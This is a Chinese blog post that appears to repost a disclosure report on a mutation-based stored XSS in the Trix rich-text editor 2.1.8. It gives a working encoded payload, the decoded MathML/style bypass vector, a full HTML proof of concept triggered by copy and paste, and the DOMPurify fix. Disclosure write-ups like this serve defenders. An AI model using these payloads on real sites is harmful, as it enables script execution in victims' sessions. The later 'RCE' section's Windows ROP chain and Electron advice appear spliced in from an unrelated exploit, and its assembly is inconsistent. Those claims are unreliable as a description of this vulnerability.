Trix编辑器最新版本(2.1.8)中的基于变异的存储型XSS漏洞分析

本文详细分析了Trix编辑器最新版本(2.1.8)中发现的基于变异的存储型XSS漏洞,包括漏洞原理、利用向量、复现步骤以及修复方案。通过复制粘贴特殊构造的HTML实体,攻击者可绕过过滤机制执行任意JavaScript代码。

报告 #2819573 - Trix Editor最新版本(2.1.8)中的基于变异的存储型XSS

漏洞概述

在Trix Editor(https://github.com/basecamp/trix)中发现了一个绕过过滤器的漏洞,该漏洞基于变异XSS,通过复制粘贴向量可实现XSS攻击。

漏洞详情

示例Payload 

1

<div data-trix-attachment="{&quot;contentType&quot;:&quot;text/html5&quot;,&quot;content&quot;:&quot;&lt;math&gt;&lt;mtext&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/style&gt;XSS POC&quot;}"></div>

解码HTML实体后得到以下有效载荷,包含变异XSS向量:

1

<math><mtext><table><mglyph><style><img src=x onerror=alert()></style>

关于此绕过技术的更多细节可参考:https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/

复现步骤

使用类似报告#2521419中的PoC可以复现该漏洞。将以下代码保存为.html文件,然后复制文本"copy me"并粘贴到编辑器中,这将弹出一个alert。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

<!DOCTYPE html>
<html lang="en">
<head>
 <meta charset="UTF-8">
 <title>Trix Editor XSS Demo</title>
 <script src="https://cdn.jsdelivr.net/npm/trix@2.1.8/dist/trix.umd.js"></script>
 <link href="https://cdn.jsdelivr.net/npm/trix@2.1.1/dist/trix.min.css" rel="stylesheet">
</head>
<body>
 <h1>Trix Editor XSS Demo</h1>
 <trix-editor></trix-editor>
 <script>
  document.write(`copy<div data-trix-attachment="{&quot;contentType&quot;:&quot;text/html5&quot;,&quot;content&quot;:&quot;&lt;math&gt;&lt;mtext&gt;&lt;table&gt;&lt;mglyph&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/style&gt;XSS POC&quot;}"></div>me`);
 </script>
</body>
</html>

影响

攻击者可利用这些漏洞在用户会话上下文中执行任意JavaScript代码,可能导致未经授权的操作或敏感信息泄露。

RCE利用

通过进一步的利用链,该XSS漏洞可升级为远程代码执行(RCE)。研究人员开发了针对Windows和macOS系统的ROP链,能够成功执行系统命令(如启动计算器)。

Windows ROP链示例 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

; ROP Stage 1: Write "calc.exe" to a writable memory section
pop rcx              ; Load "calc.exe" part into rcx
ret;
pop rax              ; Load writable address into rax >0x9519000
ret;
mov [rax], rcx       ; Write "calc" to writable section

; ROP Stage 2: Resolve kernel base and WinExec function address
pop rcx              ; Load kernel base into rcx
ret   ;
mov rax, [rcx]       ; Resolve kernel function pointer
pop rbx              ; Load offset to WinExec
ret     ; Offset of WinExec from kernel base ->0x68820
add rax, rbx         ; Calculate WinExec address

; ROP Stage 3: Prepare parameters for WinExec
pop rcx              ; Load address of "calc.exe" into rcx; 0x9519000
ret;
pop rdx              ; Load SW_SHOWNORMAL into rdx
ret       ;     0x1 SW_SHOWNORMAL = 1
add rsp, 0x20        ; Align stack 
add rax, rbx         ; 

; ROP Stage 4: Trigger WinExec
call rax             ; Call WinExec("calc.exe", SW_SHOWNORMAL)

修复方案

Basecamp团队部署了修复方案,使用DOMPurify进行HTML净化:

1
2
3
4
5
6
7

sanitize() {
 return this.sanitizeElements(),
 this.body = Nr(tl.sanitize(this.body, {
 ADD_ATTR: ["language"]
 })),
 this.normalizeListElementNesting()
}

建议使用DOMPurify的RETURN_DOM选项直接返回DOM树,而不是对净化后的字符串进行额外处理:

1
2

// return a DOM HTMLBodyElement instead of an HTML string (default is false)
const clean = DOMPurify.sanitize(dirty, {RETURN_DOM: true});

后续更新

漏洞修复后发布了Trix Editor版本2.1.9和1.3.3,并分配了CVE:https://github.com/basecamp/trix/security/advisories/GHSA-6vx4-v2jw-qwqh

建议持续更新Electron版本并启用沙箱功能,以进一步增强安全性。

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次